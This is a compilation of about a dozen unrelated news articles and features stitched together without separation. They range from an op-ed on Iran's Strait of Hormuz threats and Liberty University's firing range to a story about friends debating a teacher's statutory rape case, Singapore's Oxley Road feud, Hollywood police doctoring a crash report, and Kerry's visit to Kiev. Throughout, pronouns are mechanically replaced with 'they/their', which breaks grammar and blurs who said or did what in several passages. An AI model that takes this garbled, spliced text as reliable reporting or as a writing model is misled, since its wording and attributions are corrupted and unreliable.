Supreme Loser
The United States and Iran are once again set on a collision course — this time over the world's narrowest choke point, the Strait of Hormuz. With the specter of more draconian sanctions hovering over its oil exports, the Iranian regime threatened in late December to seal off the strait through which 30 percent of the world's oil supply travels. Iran's menacing rhetoric was matched by a bellicose rebuff from the U.S. Navy's 5th Fleet, based in neighboring Bahrain, warning that any disruption of the strait "will not be tolerated."
The exchange was of a piece with Supreme Leader Ali Khamenei's new foreign-policy doctrine: Iran will "respond to threats with threats." The regime's inflammatory language certainly got the world's attention, reminding the West and its local allies that the Persian Gulf is a tinderbox where a single miscalculation could trigger a catastrophic war.
But was threatening to set off a global recession such a smart move? In fact, Khamenei — the ultimate arbiter of Iran's internal politics and international relations — has proved themselves a poor analyst of the West's red lines toward their country, and this confrontation is just the latest incident to bring the supreme leader's strategic calculus into question. Although Tehran might benefit from the threat by jacking up oil prices, a blockade of the strait would deprive the Iranian government of half its revenue, sour relations with China and Japan, alienate Oman and Iraq as its remaining regional allies, and escalate conflict with Washington to a level that could easily spiral out of control. It would be an own goal of epic proportions.
Whether these threats are serious or not, Iran is playing a dangerous game of chicken. Just this week, the regime conducted a military drill in the Persian Gulf and announced a new breakthrough in its nuclear program, raising concern in Washington and feeding into hawkish critiques of U.S. President Barack Obama's sanctions strategy. But is bluster a winning strategy for Iran? The Islamic Republic has a history of boneheaded foreign-policy blunders, and no single case illustrates Khamenei's strategic ineptitude better than their handling of Iran's nuclear crisis.
At its onset, nearly a decade ago, the firestorm over Iran's atomic ambitions was a blessing in disguise for the supreme leader. For the first time since the Iran-Iraq War, the regime had an issue that could potentially revitalize its exhausted esprit de corps, rally the nation around the flag, bolster Iran's clout across the Islamic world, and fracture the hostile international coalition.
At first, the shock and awe of Saddam Hussein's 2003 overthrow in Iraq compelled the conservative ayatollah to opt for compromise over conflict. When negotiations with the Europeans failed to win U.S. support, however, Khamenei concluded that "nuclear diplomacy" was little more than regime change in disguise.
The turbaned helmsman laid out their nuclear calculus in a meeting of Iran's Supreme National Security Council in 2004. Contending that the United States and its allies were unwilling to find a modus vivendi with the Iranian theocracy, Khamenei maintained that nuclear capitulation would only invite more pressure on human rights issues, sponsorship of terrorism, and regional subversion.
The nuclear nonproliferation regime also appeared innately unjust, particularly given Israel's atomic ambiguity. The regime's ideological foundations, based on warmed-over Third Worldism and Islamic universalism, also called for resistance. Thus, strategic considerations were melded with ideology to transform the nuclear program into the apotheosis of Iran's revolutionary defiance.
Initially, Khamenei's nuclear brinkmanship seemed to have worked. But even a successful policy requires constant recalibration — a skill that the stubborn, geriatric leader lacks.
In 2005, Iranian pragmatists such as Hassan Rowhani, then Iran's national security advisor, advocated appeasement and forewarned of the perils should Iran be ambushed at the U.N. Security Council. Khamenei rebuffed their proposal, reprimanding them for succumbing to Western intimidation. They believed that divisions in the international community would prevent such a referral. A year later, they got their comeuppance when Iran's case was indeed referred to the Security Council.
Faced with the threat of international sanctions, Khamenei prescribed their usual steadfastness, counting on Russia and China to stonewall further action. Once again, they miscalculated. The sanctions resolution passed unanimously. The reclusive ayatollah's misjudgments — compounded with the diplomatic mediocrity of Mahmoud Ahmadinejad's presidential administration — brought Iran three more rounds of draconian sanctions in the ensuing years.
Flash forward to 2009, when Obama's tepid overtures received a cold shoulder from Tehran. Once again Khamenei's intransigence boomeranged back against him: The White House used their "clenched fist" to make the case that the Iranian regime was unwilling to negotiate, turning global public opinion against Iran and paving the way for further coercive measures. U.N. Resolution 1929 passed in June 2010, imposing the toughest international sanctions on Iran to date.
Over the past several months, the U.S. strategy has culminated in several condemnations of Iran on the international stage: the publication by the International Atomic Energy Agency (IAEA) of staggering details concerning the possible military dimension of Iran's nuclear activities, allegations of an Iranian plot to assassinate the Saudi ambassador in Washington, and denunciation of the clerical regime's dreadful human rights record, which yielded three U.N. resolutions in a matter of a few days.
Khamenei's nuclear gamble has been painful for the Iranian people. Corralled by sanctions and plagued with mismanagement, the country's economy is ruined, its financial sector is paralyzed, and its energy sector is in shambles. This month, an ill-considered threat to halt trade with the United Arab Emirates caused the Iranian rial to go into a free-fall, hitting its lowest-ever mark against the U.S. dollar.
International developments have also not been kind to Tehran's ruling cabal. After marginalizing the reformists, the conservative factions of the Islamic regime are now engaged in a political fratricide. In the wake of uprisings in the Arab world, Iran's popularity in the region has plummeted. The Syrian regime, Tehran's sole regional ally, increasingly appears unable to resist the calls for change shaking the entire region. Even Iran's former allies in the Non-Aligned Movement have repeatedly voted against Iran at the IAEA and the Security Council, perceiving Tehran's nuclear quest as too controversial for the country to serve as the developing world's standard-bearer. Nearly a decade since the advent of the nuclear crisis, Iran is internally divided, regionally diminished, and internationally isolated.
Not only have Khamenei's strategic goals proved elusive, but their atomic dreams remain unfulfilled. Despite Iran's bragging that it will eventually install 50,000 centrifuges, the number of machines that it can keep spinning still hovers around 8,000, and their output continues to wane. Development and mass production of the more sophisticated machines has also stagnated.
Notwithstanding these setbacks, Khamenei remains steadfast. Preserving the ideological order of the Islamic Republic is more important for the supreme leader than crossing the nuclear Rubicon. For a leader who, in the words of John Milton, prefers "to reign in hell than serve in heaven," surrender is political suicide. In the eyes of this custodian of political Islam, surrounded by a culture of complacency and mendacity, a Pyrrhic victory is divine providence.
Against this backdrop, Washington's belief in the ability of sanctions to curtail Tehran's atomic ambitions proves credulous. Iran's nuclear defiance is ideological and thus cannot be resolved by coercion. Rather than repeating the failed policy of pushing the supreme leader into a corner, the Obama administration should aim for piecemeal solutions that would allow for a face-saving compromise. The goal should be to decelerate Iran's perilous nuclear activities and put it under rigorous international monitoring until cooler heads prevail in Tehran.
LYNCHBURG, Va. — Liberty University, which heralds itself as the world's largest Christian university, is set to become the first educational institution in the nation to open an on-campus firing range.
“We have a very pro-Second Amendment student body,” President Jerry Falwell told the Washington Post this week.
They said that one of the reasons for the shooting range is because they believe those with malicious intent are more likely to carry out their attacks at facilities that are marked as “gun free zones.”
“It's where the terrorists are most likely to strike,” Falwell stated. “[Students and their families] don't want to see anything happen here like at Virginia Tech, where nobody was able to fire back.”
This week, Liberty applied for a permit to begin construction on what it called a “nationally recognized, full-scale shooting, training and competition center.” The 13,000 square-foot facility will have pistol, rifle and shotgun areas, as well as outdoor archery and skeet shooting spaces, and will cost at least $1 million to construct.
School officials discussed their ideas with the National Rifle Association before proceeding with plans.
Students with concealed carry permits are currently allowed to have guns on campus, and for the past year, Liberty University has offered a free firearms course, which it states has enrolled 1,600 thus far.
Connect with Christian News
Follow @4christiannews
However, as previously reported, Falwell generated criticism over their mindset about firearms last December when they made comments about “ending [murderous] Muslims” in light of the San Bernardino massacre in California. They urged students to obtain concealed carry permits so that they would be ready to take out Muslims intent on bloodshed should they show up at Liberty University.
“I've always thought, if more good people had concealed carry permits, then we could end those Muslims before they walked in and killed them,” Fawell stated to the student body, receiving unreserved applause.
“I just wanted to take this opportunity to encourage all of you to get your permit. We offer a free course,” they said. “Let's teach them a lesson if they ever show up here.”
They went on to reTweet social media posts in support of their remarks, including one that read, “S*CK IT, Muslim extremists,” adding a link to the school's gun course.
Falwell's comments especially raised concern among members of the Fairfax County School Board, which urged the Virginia High School League (VHSL) to discontinue hosting state championships at Liberty University.
“We are deeply disturbed by the comments of Liberty University Chancellor Jerry Falwell, Jr. … urging more than 10,000 of their assembled students to obtain handguns and stating that ‘we could end those Muslims before they walked in,'” it said in a letter in April.
While the League did ultimately pull out of Liberty, it said it was for financial reasons and not due to the board's letter.
As it generally does after a product has been on the market for long enough, Apple today added the 2016 MacBook Pro without Touch Bar to online refurbished store. While the selection is limited, these refurbished models represent a good way to get a discount while still buying straight from Apple, though we've seen better on 9to5Toys for devices in brand-new condition…
Sylvania HomeKit Light Strip
Currently, Apple is offering two models via its refurbished store, one in silver and another in space gray. The first comes in at $1869 and packs 16GB of RAM, a 512GB SSD, an Intel Core i7 2.4Ghz processor, and silver casing.The second model includes all of the same specifications, but you'll get 1TB of storage with the included SSD and space gray casing. This model comes in at $2,209.
Apple's refurbished products come with a one-year limited warranty and a 14-day return window. Here's how Apple describes its online refurbished store:
Quality products at great prices
Rigorous refurbishment process prior to sale
Covered by Apple's one-year limited warranty This will open a new window.
Covered by Apple's 14-day returns policy This will open a new window.
AppleCare can be purchased
Engraving and gift wrap not available for refurbished products
Supplies are limited
Supply for refurbished Apple products can vary wildly, so don't expect these machines to be around for too long. It could be that Apple has just a few of these machines in stock right now, or it could be that there's a plentiful supply. There's really no way to know.
While these are notable price cuts compared to Apple's normal pricing, we've generally seen just as good, if not better, deals over on 9to5Toys for brand-new models as opposed to refurbish. Keep an eye out there if you want to buy new, but head to Apple's refurbished store if you prefer to buy straight from them.
A teacher–someone society tells you to trust, someone who looks out for your well-being, someone you have repeatedly been told to obey. Someone to have sex with?
–––
‘Bloody hell,' says Tom the Pom, looking out at the drizzle of winter rain next to me. ‘Reminds me of England.'
‘Our' café is closed today and for some unexplained reason there was not even a note on the door. We're all cold from the surf, so Andrew's suggested we grab takeaway coffees and come up to their place instead. We're in Andrew's apartment, the front of which you might recognise if you've ever seen a picture of Bondi Beach. Any closer to the ocean and you could jump off the balcony and land on the sand. Looking out at the view, the damp and desolate beach filling their living-room windows, I wonder why we don't do this every week.
Michael is stretched out on the thick cream carpet behind us, reading the papers. Tom's in their kitchen making noises which have us hopeful of food.
A teacher has just been sent to prison for fifteen years for having sex with a fifteen-year-old kid in their class.
‘Look at this!' says Michael suddenly, and Tom and I turn from the window, our cardboard coffees bumping into each other. ‘This teacher has just been sent to prison for fifteen years for having sex with a fifteen-year-old kid in their class.'
Don't like ads? Become a supporter and enjoy The Good Men Project ad free
‘Fifteen years!' Tom and I say together. I've been in Australia long enough now that I can hear the Englishness in our accents, more Austin Powers than James Bond. Michael reads out the story.
‘Kathryn Ronk, of Michigan, pleaded guilty to third degree criminal sexual conduct with a student. They had sex in classrooms, a car, and a third location in a nearby county, whatever that means.'
They turn the paper and holds it up so we can see the photos of the teacher.
‘Not bad' says Tom. ‘Did someone examine the kid's back to see if was damaged from all their mates patting them on it?'
‘What?! So rape's a joke now?'
◊♦◊
None of us has noticed Andrew entering the room. He's carrying a tray of buttered toast with jars of jam and marmalade. And, I kid you not, he's wearing an apron. The expression on their face tells me not to make a joke about this last point.
‘Statutory rape' says Michael, reading from the paper again.
‘Rape is a big ugly word' says Tom, taking a piece of toast from the tray before Andrew's even put it on the coffee-table. ‘Rape for me implies violence. Is there any indication here the kid wasn't willing?'
The point is, he's a child. Therefore, it's rape.
‘The child' says Andrew testily ‘probably wasn't in a position to decide if they were willing or not. But even if they are, the point is he's a child. Therefore it's still raped.'
I ask what the age of consent is in the States, hoping a concentration on the facts will help. Andrew crosses to a huge oak desk, picks up their iPad and starts stabbing at it with theirs forefinger.
‘In Michigan it's sixteen' they tell us.
‘She should have waited a couple of months' says Michael from the floor, where he's now turned to a sports story. ‘Given them a legal birthday present.'
‘None of you are parents' says Andrew, dropping the iPad heavily onto the desk. ‘You don't understand. If anyone ever touched one of my boys…'
They look at their watch, and I suspect he's just remembered they have to pick them up in an hour or so.
‘Your boys are nine and eleven' says Michael. ‘That's different. And no, none of us are parents, but we were all once fifteen year old boys. We all remember how willingly we would have had sex with a woman who looked like that. Apart from you, Ged.'
I tell them not to worry about me. I spent a lot of my sixteenth year fantasising about sex with Mr Breckenridge, my maths teacher. Most of that was in the classroom too, come to think of it. Tom laughs out loud at this but Andrew is not amused.
The law was there to protect you. Your teachers were there to protect you too.
‘Maybe you'd liked to have driven a fast car or got drunk or taken drugs' they say. ‘But you didn't because the law was there to protect you. Your teachers were there to protect you too. And, for the record, I don't know what it's like in Michigan but in New South Wales the age of consent is sixteen too. Unless you are a teacher or other form of guardian, in which case the other person has to be eighteen. So if they wanted to give them a “birthday present” she'd have had to wait three years.'
He's not quite shouting this but he's not far off it either. If Tom's around, this normally this leads to a fight. No matter what side of the argument he's on, Tom can't resist responding in real shouts before storming out in a huff. Michael and I look at each other nervously.
◊♦◊
But Tom just puts down their cardboard coffee cup, wipes their mouth free of crumbs and walks slowly into the kitchen. I'm pretty sure they meant to go to the bathroom but that's on the other side of Andrew.
‘I think we all agree they shouldn't have done it,' I say to break the embarrassing silence we're left in. ‘We're just shocked at the fifteen year sentence. What's the point in that?'
“They were all about you and what you were going through. Poor you. Nothing about the victim.”
Michael has flipped back to the article in the paper. ‘Says here the judge was distraught and angered over receiving so many letters supporting the teacher. Quote: “They were all about you and what you were going through. Poor you. Nothing about the victim”.'
Michael's pronounces the last word so ironically that I jump in before Andrew can.
Don't like ads? Become a supporter and enjoy The Good Men Project ad free
‘Come on, Mikey, we don't know the facts. Sure, this kid might be mature and confident, and they might have wanted it. But it's just as likely he's gentle and easily-led and they might have really screwed them up. We're reading a news story, not the court transcript. If the judge describes them as a “victim” they probably have them reasons.'
‘He's a child' says Andrew. ‘In a sexual situation, of course he's a victim.'
‘I had sex when I was fifteen' says Michael. ‘It was great.'
‘Who with? With someone in authority, who you weren't sure if you could defy? Someone who you had repeatedly been told to obey? Someone society told you to trust, someone who's job it was to look out for your well-being?'
Mikey doesn't have an answer to this and, I'll be honest, I hadn't thought of it that way either. It occurs to me for the first time that Tom is wrong, we don't remember what it was like being fifteen years old.
Andrew sighs heavily and sits down on the nearest sofa, their feet near Michael's paper. They look worried and I suspect he's wondering what Tom is up to. They notice their apron, swears and starts pulling themselves free of it.
If the judge was pissed off at getting the letters, they should punish the people who wrote them – or the lawyer who encouraged them – not the person they were written about.
‘Either way,' they say when he's finished, ‘the letters are a ridiculous justification for any sentencing. If the judge was pissed off at getting the letters, they should punish the people who wrote them – or the lawyer who encouraged them – not the person they were written about. And a fifteen year sentence is just stupid. Sounds like a headline to me, read on and you'll probably find she's due for parole in five or something. You two going to eat this toast or what?'
Don't like ads? Become a supporter and enjoy The Good Men Project ad free
◊♦◊
It's fifteen minutes later when Tom joins us again. We've moved on to discussing the imminent arrival in Australia of Netflix and all the toast has gone. Tom must have washed their face in the kitchen sink, their face is damp and their hair is stuck flat to theirs forehead.
‘I did it' they say, plumping themselves down on the sofa beside Andrew. ‘I bloody well did it!'
Andrew obviously knows what he's talking about and gives Tom a smile and congratulatory punch in the arm. I'm not sure I want to ask, so I let Michael do it from the carpet. Did what?
‘I breathed myself down My anger-management guy's teaching me this technique for when I get angry. Even though at that moment at least one of you is a complete idiot deserving a slow death, I have to go away and breathe and stuff and….ha, I did it!'
Learning the difference between what you want to do and what's right to do is what being an adult is all about.
‘It's called taking responsibility for your actions' says Andrew. ‘Learning the difference between what you want to do and what's the right thing to do. We all have to do it, that's what being an adult is all about.'
Don't like ads? Become a supporter and enjoy The Good Men Project ad free
‘Easy' says Tom.
‘Don't worry,' says Mikey from the carpet, flicking back through the paper to find the right page. ‘He's not talking about you. He's talking about….HOT TEACHER!!!'
And so it all kicks off again. But this time Mikey's on their own.
5 Bad Surfers take on social issues of relevance to the modern man.
Photo Credit: Getty Images
SINGAPORE - The Attorney-General's Chambers (AGC) said on Monday (July 17) it is looking into a recent Facebook post put up by Mr Li Shengwu, the son of Mr Lee Hsien Yang and nephew of Prime Minister Lee Hsien Loong.
In a private post, which was uploaded on Saturday, Mr Li, 32, shared a Wall Street Journal article on the recent Oxley Road dispute, titled "Singapore, a model of orderly rule, is jolted by a bitter family feud".
They also commented on Singapore's court system.
The AGC said in a brief statement on Monday morning that it is aware of Mr Li's post and is looking into the matter.
In a Facebook post on Monday afternoon responding to AGC's statement, Mr Li said they were "somewhat surprised" that their last post - which was shared on "friends only" privacy settings - was enough to trigger a response.
They added: "I'm surprised that the Singapore government is so petty. Would they also like to trawl my private Facebook feed for seditious vacation photos?"
Mr Li's aunt, Dr Lee Wei Ling, also commented on the matter in a Facebook post on Monday, saying that they were surprised at the AGC's "negative reaction to a private post".
Related Story Read more: Oxley Road Dispute
"Is there a government servant whose duty is to follow the Facebook activity of all people related to Hsien Yang and I, including our private musings. What Shengwu posted is a common topic amongst Singaporeans who are well informed," they wrote.
They asked: "Is this not an example of 'Big Brother' government," using the famous phrase from George Orwell's 1984 novel to refer to an authoritarian government which exercises total control over its citizens.
Senior Minister of State for Health and Communications and Information Chee Hong Tat was quoted by Chinese daily Lianhe Zaobao on Monday as saying that they were "disappointed" with Mr Li's actions.
Mr Chee, who was the late Mr Lee Kuan Yew's Principal Private Secretary from 2008 to 2011, added: "Is this respecting Mr Lee Kuan Yew and their values? I don't understand why they continue to launch online attacks, after their father already said they were going to stop doing so."
Mr Lee Hsien Yang and Dr Lee had been embroiled in a public dispute with PM Lee over the fate of their father's Oxley Road home since mid-June.
The dispute prompted PM Lee to deliver a ministerial statement in Parliament on July 3 to address their allegations that they had abused their power.
The feud, which made international headlines, took a conciliatory turn on July 6, after PM Lee's younger siblings said they accepted their desire to settle their quarrel in private and will stop posting evidence against them online as it was hurting Singapore's reputation.
Hyatt used to have a super generous and game-able offer where anyone with even Hilton Gold (through a credit card signup) could get temporary Diamond status complete with confirmable suite upgrades.
Park Hyatt Chennai
They eliminated that last fall, and have been on again, off again at best with select status challenges that do not ‘advance' top tier elite status.
Now they're back it seems.
Diamond Room Service Breakfast at the Park Hyatt Vendome, Paris
With many members worried over Marriott's acquisition of Starwood, Hyatt took to Twitter to look for disaffected elites from other chains and offer them status matches.
It appears they are comping Diamond status through February 2017 to anyone who connects with them on Twitter and sends in an eligible elite membership card and a statement that shows one stay.
I maintain Hyatt Diamond status and am pleased. I receive (4) confirmed upgrades each year that are good for a confirmed at booking suite on any paid Hyatt rates up to 7 nights each. Hyatt has the best breakfast benefit (full restaurant breakfast for up to 4 registered guests when no club lounge is available at full service hotels).
If you have status with another hotel chain and a statement showing 1 stay or more, it's worth messaging @HyattConcierge on Twitter.
As part of a newly published roadmap for the Bitcoin Foundation, executive director Bruce Fenton has suggested removing bitcoin creator Satoshi Nakamoto as a founding member.
Though they called for the removal of all founding members from the organisation, Fenton singled out Nakamoto's inclusion as “not accurate”, arguing that they or they were never involved in the group's creation.
Now a largely symbolic title, the move would also strip Gavin Andresen, Peter Vessenes, Charlie Shrem, Roger Ver, Patrick Murck and Mark Karpeles of the distinction.
Fenton's remarks suggest the intent of the change would be to underscore that the Bitcoin Foundation is a decentralized network, one that they believe should work to avoid venerating individuals over collective goals.
They wrote:
“Overall, we should reduce power of individuals but work to remain effective using decentralization, crowdfunding and other means.”
Notably, the presentation marks the second time that Fenton has referred to bitcoin's enigmatic creator during their tenure, following their first tweet in the position reminding Nakamoto that “she has a board seat per the bylaws, if they produce a PGP key”.
The remark received a warm reception given the frequent portrayal of the unknown founder as a male and recent criticisms in the media regarding bitcoin's largely male following.
Move toward transparency
Fenton began the presentation by looking to set the record straight on the organisation, seeking to emphasize how it does not control or represent bitcoin as often portrayed in the media.
They sought to illustrate how they are seeking to make the foundation more transparent and democratic, having already released financial records for the nonprofit on 17th April and enabled a board chair to be appointed by election at the suggestion of a member.
Going forward, Fenton suggested they would seek to continue this emphasis on transparency, stating that IRS forms would be released along with items such as the organisation's executive compensation and travel policy.
Additional proposals included plans to re-use Swarm to conduct blockchain-based voting in foundation elections and using Factom to secure foundation records to the bitcoin blockchain.
A full copy of the presentation can be found below:
Bitcoin Foundation Update from Bruce Fenton
Image via Pete Rizzo for CoinDesk
ORLANDO, Fla. -- On so many different levels, Tiger Woods' life is nothing like ours -- unless your life includes the following five things:
-- Your girlfriend owns more gold than the Franklin Mint.
-- You and the planet's most famous skier just conducted a pre-emptive surgical strike against the "stalkarazzi."
-- You and Arnold Palmer share the cover of the best-selling golf video game franchise.
-- You're a victory away from reclaiming the No. 1 world ranking.
-- There's already a billboard of you (and the wristwatch you endorse) in place near the Interstate 20 exit leading to Augusta National Golf Club.
This is the sometimes strange, surreal existence of Woods.  They are larger than life.  They are a global brand. They speak ... or dates ... or wins and it gets microwaved into instant news.
But as they slouched comfortably in a dinged-up, black leather chair during their Wednesday news conference at Arnie's tournament, Woods struck me as a guy who has finally found something that eluded them for years.
Happiness. Even contentment.
Who knows for sure, but Woods sounds and looks as if he's whole again. Or close to it.
Their game is healthy. Their knees and Achilles are healthy. Their state of mind is healthy. The fire hydrant incident seems like epochs ago.
Woods would be the first (OK, maybe second) to say that much of their former personal misery was self-inflicted. Combine that with a series of debilitating injuries and you had a man in personal and professional crisis.
That version of Woods no longer exists. That version of Woods put razor wire around their thoughts and didn't allow anyone inside. They were a work in progress.
But you should have heard them Wednesday. They spoke about the past, present and future, and did so without putting a word count on their answers. Their deflector shields were lowered, not all the way, of course, but enough to see that the 2013 version of Woods is in a much better place than the 2009, 2010 and 2011 versions.
They spoke about their girlfriend, Olympic ski champion Lindsey Vonn, and their decision to release photos of them as a couple. By doing so, they kneecapped anyone trying to score the first photo.
"We're very happy where we're at, but also we wanted to limit the stalkarazzi and all those sleazy websites that are out there following us," said Woods.
They spoke about their father, Earl, and how badly they wanted to win the 2006 Masters for their old man, who would die a month after the tournament from prostate cancer.
"I've lost tournaments before," said Woods, "and I've been through some tough defeats over the years, but nothing like that because I knew my dad would never live to see another major championship ... There's never been another defeat that felt like that."
And they spoke not only about their quest to regain the No. 1 ranking in the world, but about reconfiguring their golf legacy.
Question: "Do you think you can become as good as you once were?"
Say goodbye to the slick professional scammer from “Squad 38,” and hello to chaebol Louie.
On September 2, MBC's new, upcoming Wednesday-Thursday drama “Shopping King Louie” released its very first teaser, partially introducing their two main leads.
In the short video, Seo In Guk slowly leans closer to Nam Ji Hyun, before muttering, “I'm hungry. Give me food,” and adorably smiling.
The teaser briefly shows that Seo In Guk will play “Greenhouse Prince Louie from France,” while Nam Ji Hyun will play “Natural beauty Go Bok Shil from Gangwon Province.” It curiously ends with a caption that asks, “How did you two meet?”
The lighthearted music and effects hint at the lovable chemistry that these two characters will reportedly have.
“Shopping King Louie” is a romantic comedy that tells the story of Louie, a chaebol heir who has no memory of their past and ends up in Seoul after being raised in France their whole life, and Go Bok Shil, a go-getter rural girl whose trying to make a name for themselves in the busy city. Already highly anticipated for being a prize-winning drama, it will also star Yoon Sang Hyun and Im Se Mi as well.
Written by Oh Ji Young and directed by Lee Sang Yeob, “Shopping King Louie” will premiere on September 21 at 10 p.m. KST, following the end of “W.”
Source (1)
Downtown Denver's wait for a full-service grocery store is almost over.
The King Soopers at 20th Street and Chestnut Place will open its sliding doors at 6 a.m. Aug. 12, a corporate spokesperson confirmed Friday. A ribbon-cutting ceremony, with King Soopers leadership and elected officials, is scheduled for 9 a.m.
The 46,475-square-foot grocery store, on the ground floor of a five-story luxury apartment building between Union Station and Coors Field, has been under construction since 2013.
The surrounding neighborhoods — Lower Downtown, Central Platte Valley and Central Business District — have wanted a full-service grocery store for much longer than that.
“It's been an underserved neighborhood for a long time,” King Soopers spokesperson Kelli McGannon said. “It was really about finding the right development with a suitable retail location.”
That location, 1950 Chestnut Place, will include 86 free parking spaces for customers, a pharmacy with separate street entrance and, given its proximity to Coors Field, a bigger service desk to handle game-day demand for Rockies tickets.
From the entrance on Chestnut, customers will find themselves in the heart of an expanded fresh- and prepared-foods selection, tailored to the rapidly developing urban neighborhood.
“This store, it will be more of a foodie experience inside,” McGannon said.
Among the amenities are a Murray's Cheese Shop, with 130 specialty cheeses; Boar's Head Sandwich and Panini Shop; and Bistro at 5280, serving up burritos, salads, rotisserie chicken and other prepared meals.
A dine-in sushi shop features a “sushi train,” a specialized conveyer belt that will carry sushi to customers sitting at the bar, McGannon said.
The store's Starbucks, which boasts an outdoor patio along 20th Street, will stay open until midnight — much later than most in-store locations.
The store will also offer outside tailgate specials on Rockies game days, McGannon said. “A lot of emphasis in this store is to be local and a reflection of us being a Colorado company.”
Inside the store Friday morning, nonperishable goods were being stocked for the first time along aisle upon aisle, a process that began this week, McGannon said. To ensure freshness, produce won't be brought in until the day before opening.
Other finishing touches, including a mural of Colorado's Rocky Mountain peaks, are still being applied.
Upstairs, Elan Union Station, the 314-unit apartment complex that shares the building, was already 50 percent leased as of Friday, community manager Nikki Willis said.
The first residents moved in May 1. Construction on the final units, on the side of the complex closest to Coors Field, is expected to be finished in October, they said.
The studio, 1-, 2- and 3-bedroom apartments, which feature quartz countertops, bamboo floors and smart thermostats, range from $1,475 to $4,305 a month, according to the property website. Community amenities include outdoor courtyards with a year-round swimming pool and bocce ball court; tech center with private workstations; yoga/barre studio; dog washing station; and a bike- and ski-repair shop.
“The King Soopers factor is huge,” Willis said. “There's no other grocery store downtown, and we have an elevator that goes into a resident lobby and directly into the King Soopers.”
Other retail tenants in the building will be a Wells Fargo branch and a restaurant by an undisclosed local restaurateur, they said.
Emilie Rusch: 303-954-2457, erusch@denverpost.com or twitter.com/emilierusch
After a Hollywood police officer rear-ended a car in February and then arrested the driver on drunken driving charges, they and other officers talked about doctoring the report--it said a jumpy cat created a distraction--to cover up the crash.The exchange was recorded by a dashboard camera in one of the patrol cars. The officers apparently didn't realize it was on."I don't want to make things up ever, because it's wrong, but if I need to bend it a little bit to protect a cop, I'm gonna," one of the officers can be heard saying."We'll do a little Walt Disney to protect the cop because it wouldn't have mattered because they are drunk anyway."Alexandra Gabriela Torrensvilas, 23, of Hollywood, ended up charged with four counts of drunken driving and cited for improper lane change.On Tuesday, Hollywood police officials placed Officer Dewey Pressley, 42, Officer Joel Francisco, 36, Sgt. Andrew Diaz, 39; and civilian Community Service Officer Karim Thomas, age unavailable; on administrative duty pending an internal affair investigation and a review by the Broward State Attorney's Office, said spokesperson Lt. Scott Pardon.Francisco was driving the car in the crash; Pressley wrote the report and made the arrest.Pressley's report detailing the Feb. 17 midnight crash in the 2800 block of Sheridan Street said "a large gray stray cat" that had been sitting on Torrensvila's lap jumped out of their car window and distracted her, causing them to veer into Francisco's lane, where they abruptly braked, and they hit her."I will do the narrative for you," one of the officers says on the tape. "I know how I am going to word this, the cat gets them off the hook."Torrensvilas' attorney, Larry Meltzer, said this is a disturbing "abuse of power.""Actually seeing it transpire on video in front of you, it really kind of sickens you," they said."It's really nauseating to sit there and watch your client's rights go out the window."Torrensvilas' four DUI charges carry a maximum penalty of nearly three years in jail, Meltzer said.He declined to say what will become of their case: "In my opinion, as of this time, it's being handled appropriately."A spokesperson for the Broward State Attorney's Office declined to comment on the case or how it will proceed.Pressley, a 21-year veteran with the agency, wrote that when Francisco approached Torrensvilas' car after the crash, they blurted: "It just jumped out."The "it" was "a large, gray stray cat" that had been sitting on their lap while they drove, the report said.Francisco, who has been with the agency for nearly 11 years, smelled "a strong odor of an alcoholic beverage."Public Defender Howard Finkelstein on Tuesday sent a letter to Hollywood Police Chief Chadwick Wagner calling for answers and accountability."Not only did these officers make a conscious decision to shift the blame to this young woman, but they made a concerted effort to write a narrative to fit 'their facts,' " Finkelstein wrote.He said their office has at least 27 pending cases in which these four officers are listed as material state witnesses.Pardon, the police department's spokesperson, declined to respond to the allegations. "We'll see where the investigation goes," they said.
Dispatching sizable troop reinforcements into Crimea on Monday, Russia consolidated its military control over the southeastern Ukrainian territory and may be preparing for a wider invasion of the country, senior U.S. officials traveling with Secretary of State John Kerry to Kiev, the restive Ukrainian capital, said early Tuesday.
"We still have a very real concern that the Russians have other plans in Ukraine," said one senior U.S. official, briefing reporters aboard Kerry's official airplane en route from New York to Kiev. "They may be planning other moves."
For the first time since the crisis erupted, senior U.S. officials complained of difficulty tracking Russian troop movements. They said the expected redeployment of Russian security forces following the end of the Olympic Games in Sochi, as well as routine military exercises in the area, had complicated the task of determining how many Russian troops are still pouring into Crimea.
The officials could not immediately dismiss reports that the number of total Russian troops in Crimea may now have reached as high as 16,000, which if true would appear to mark a surge of an additional 10,000 troops into the area within a period of 24 to 36 hours. "It's clearly a large number," an official said.
At the same time, the officials noted reports of Russian aircraft approaching, or even trespassing in, Ukrainian airspace, and Ukrainian jets scrambling to repel them. U.S. Ambassador to the U.N. Samantha Power told the U.N. Security Council on Monday that "it is a fact" that Russian jets entered Ukrainian airspace.
More On This...
The U.S. officials also cited evidence that Ukrainian and Russian forces have each been massing on opposite sides of the isthmus that connects Ukraine to Crimea -- a development that one senior U.S. official said "raises the prospect" that the Kremlin may be preparing to "extend" its invasion to the mainland.
As Kerry landed in Kiev, Russian President Vladimir Putin delivered their first press conference since the start of the crisis, blaming what they called an "unconstitutional overthrow and seizure of power" by Ukraine's opposition.
The U.S. officials traveling with Kerry emphasized that the Obama administration is still seeking to "de-escalate" the Crimean crisis by giving Putin "off-ramps" they can pursue. However, the officials conceded that the Russian government has not listed any conditions, or any set of conditions, that can transpire or be arranged that would persuade Moscow to withdraw its forces from Crimea, as the U.S. and European allies are demanding.
If Putin does not withdraw Russian forces, the officials said, the U.S. will impose "more robust" punishments, including the imposition of sanctions on as-yet-unspecified Russian individuals and institutions. One senior U.S. official said such sanctions will likely be "coming soon ... in days, not weeks," but otherwise declined to elaborate on whom or what they would target or how they would be structured. Another official said the sanctions, in tandem with further measures coordinated with European allies, will have as their goal the establishment of "leverage over Russia."
The objective is to persuade Moscow to enter into a dialogue with the new Ukrainian government about the restoration of central control over Crimea and the holding of free and fair elections for the entire country on May 25.
One idea for punishing Moscow that Republican critics of the Obama administration have advanced in recent days these senior U.S. officials rejected flatly: a swift reappraisal of the administration's previous decisions on the siting of missile defense installations, long an irritant to the Kremlin.
Asked if the Ukrainian crisis has caused the administration to look at missile defense "with fresh eyes," one official said flatly: "No." The official added only that the subject is an "important" one for Washington to "keep talking to [the Russians] about."
Kerry touched down in Kiev early Tuesday, eager to demonstrate the United States' support for the interim Ukrainian government. Within a fortnight, the cash-strapped country has seen its Kremlin-allied president toppled from power amid bloody street protests in its capital and an invasion of its southeastern peninsula by Russian forces.
Kerry was to tour shrines in the public square in Kiev where scores of protesters were mowed down last month by snipers loyal to President Viktor Yanukovych, who has since fled the capital. After that, Kerry was meeting with the country's new interim prime minister and acting president, as well as leaders from its Rada parliament.
